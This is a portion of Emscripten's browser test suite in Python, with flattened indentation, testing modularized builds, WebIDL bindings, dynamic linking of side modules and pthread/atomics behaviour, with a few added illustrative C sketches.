# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
self.set_setting('EXIT_RUNTIME')
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
# an amount of memory, different from the default, that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// access Module with bracket notation so the test still succeeds when closure compiler is enabled
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-sWASM=0', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?exit:0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('main.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
return 0;
}
''')
create_file('side.c', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', 'side.wasm'])
print('wasm in worker (we can read binary data synchronously there)')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm'])
print('wasm (will auto-preload since no sync binary reading)')
# same wasm side module works
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sEXPORT_ALL', 'side.wasm'])
def test_dlopen_async(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE'])
self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-sMAIN_MODULE=2'])
def test_dlopen_blocking(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE', '-sUSE_PTHREADS', '-Wno-experimental'])
# Attempting to dlopen the side module (without preloading) should fail on the main thread
# since the synchronous `readBinary` function does not exist.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-sMAIN_MODULE=2'])
# But with PROXY_TO_PTHREAD it does work, since we can do blocking and sync XHR in a worker.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-sMAIN_MODULE=2', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-Wno-experimental'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output, emcc_args=[]):
# XXX there is no infrastructure (yet?) to retrieve stdout from the browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args)
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('main.c', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
return 0;
}
''')
create_file('side.c', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sLEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('main.c', r'''
#include <assert.h>
int side1();
int side2();
int main() {
assert(side1() == 1);
assert(side2() == 2);
return 0;
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# refer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <cassert>
#include <thread>
#include <emscripten/emscripten.h>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
assert(side1_ptr == &side1);
assert(side2_ptr == &side2);
emscripten_force_exit(0);
}).detach();
emscripten_exit_with_live_runtime();
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.cpp'),
args=['-Wno-experimental', '-pthread', '-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-sASSERTIONS', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=16MB', '-sTOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-gsource-map', '-std=gnu11', '-xc', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking when there are not enough threads in the pool.
self.btest(test_file('pthread/test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=3', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that a pthread can create another pthread when the strict pool is large enough.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=2', '-sPTHREAD_POOL_SIZE_STRICT=2'])
# Check the small-pool variant (-DSMALL_POOL), where the strict pool only has room for one thread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=1', '-sPTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-g1'] + args)
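# Hedged single-threaded sketch (not part of the suite) of the emscripten_ atomics API the test
# above exercises, from emscripten/threading.h. Return-value semantics are deliberately not
# asserted here; only the stored results are checked. File name and flags are illustrative.
def _sketch_emscripten_atomics_api(self):
  create_file('atomics_demo.c', r'''
    #include <assert.h>
    #include <stdint.h>
    #include <emscripten/threading.h>
    int main() {
      uint32_t x = 1;
      emscripten_atomic_add_u32(&x, 2);     // x becomes 3, atomically
      assert(emscripten_atomic_load_u32(&x) == 3);
      emscripten_atomic_cas_u32(&x, 3, 7);  // compare-and-swap 3 -> 7
      assert(emscripten_atomic_load_u32(&x) == 7);
      return 0;
    }
  ''')
  self.btest_exit('atomics_demo.c', args=['-pthread'])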
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_64bit_cxx11_atomics(self, opt):
for pthreads in [[], ['-sUSE_PTHREADS']]:
self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sPROXY_TO_PTHREAD', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
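# Hedged sketch (not part of the suite) of the builtins the two tests above cover:
# __sync_fetch_and_add applies its update atomically, so increments from several threads are
# not lost. The file name, pool size and loop counts are illustrative.
def _sketch_sync_fetch_and_add(self):
  create_file('fetch_add.c', r'''
    #include <assert.h>
    #include <pthread.h>
    static int counter = 0;
    static void *work(void *arg) {
      for (int i = 0; i < 1000; i++)
        __sync_fetch_and_add(&counter, 1);  // atomic read-modify-write
      return 0;
    }
    int main() {
      pthread_t t[4];
      for (int i = 0; i < 4; i++) pthread_create(&t[i], 0, work, 0);
      for (int i = 0; i < 4; i++) pthread_join(t[i], 0);
      assert(counter == 4 * 1000);
      return 0;
    }
  ''')
  self.btest_exit('fetch_add.c', args=['-pthread', '-sPTHREAD_POOL_SIZE=4'])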
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-O2', '-sPTHREAD_POOL_SIZE=8'])
# Tests the rest of the remaining GCC atomics after the two above tests.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
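# Hedged sketch (not part of the suite) of the two primitives named above: a spinlock built
# from __sync_lock_test_and_set / __sync_lock_release guarding a plain counter. Names and
# pool size are illustrative.
def _sketch_sync_lock_spinlock(self):
  create_file('spinlock.c', r'''
    #include <assert.h>
    #include <pthread.h>
    static int lock = 0;
    static int counter = 0;
    static void *work(void *arg) {
      for (int i = 0; i < 1000; i++) {
        while (__sync_lock_test_and_set(&lock, 1)) {}  // spin until the lock is acquired
        counter++;                                     // protected by the spinlock
        __sync_lock_release(&lock);
      }
      return 0;
    }
    int main() {
      pthread_t t[2];
      for (int i = 0; i < 2; i++) pthread_create(&t[i], 0, work, 0);
      for (int i = 0; i < 2; i++) pthread_join(t[i], 0);
      assert(counter == 2 * 1000);
      return 0;
    }
  ''')
  self.btest_exit('spinlock.c', args=['-pthread', '-sPTHREAD_POOL_SIZE=2'])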
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest_exit(test_file('pthread/test_pthread_create.cpp'),
args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-sMINIMAL_RUNTIME'])
# Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-sINITIAL_MEMORY=128MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -sPROXY_TO_PTHREAD option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-sUSE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-sUSE_PTHREADS=1', '-sPTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sINITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '--closure=1', '-sENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
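# Hedged sketch (not part of the suite) of the "volatile global for thread control" scheme
# described above: the main thread flips a volatile flag and the worker spins until it sees it.
# This leans on the lax-but-common assumption the comment mentions; names are illustrative.
def _sketch_volatile_flag_control(self):
  create_file('volatile_flag.c', r'''
    #include <pthread.h>
    static volatile int go = 0;
    static volatile int seen = 0;
    static void *work(void *arg) {
      while (!go) {}  // busy-wait for the main thread to flip the flag
      seen = 1;
      return 0;
    }
    int main() {
      pthread_t t;
      pthread_create(&t, 0, work, 0);
      go = 1;
      pthread_join(t, 0);
      return seen ? 0 : 1;
    }
  ''')
  self.btest_exit('volatile_flag.c', args=['-pthread', '-sPTHREAD_POOL_SIZE=1'])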
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sLIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
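# Test unistd file I/O (unistd/io.c) in a pthread build with WASM_BIGINT enabled.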
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd/io.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sWASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@also_with_wasm2js
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS'])
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']]:
self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-sUSE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.set_setting('EXIT_RUNTIME')
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
_Atomic int result = 0;
void *thread_main(void *arg) {
result = 1;
pthread_exit(0);
}
int main() {
pthread_t t;
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
assert(result == 1);
return 0;
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.worker.js', Path('cdn/test.worker.js'))
if os.path.exists('test.html.mem'):
shutil.copyfile('test.html.mem', Path('cdn/test.html.mem'))
self.run_browser('test.html', '', '/report_result?exit:0')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY)
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?exit:0')
# Test that when the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), no deadlock occurs.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-sINITIAL_MEMORY=128MB'])
# Test that -sABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-sUSE_PTHREADS']]:
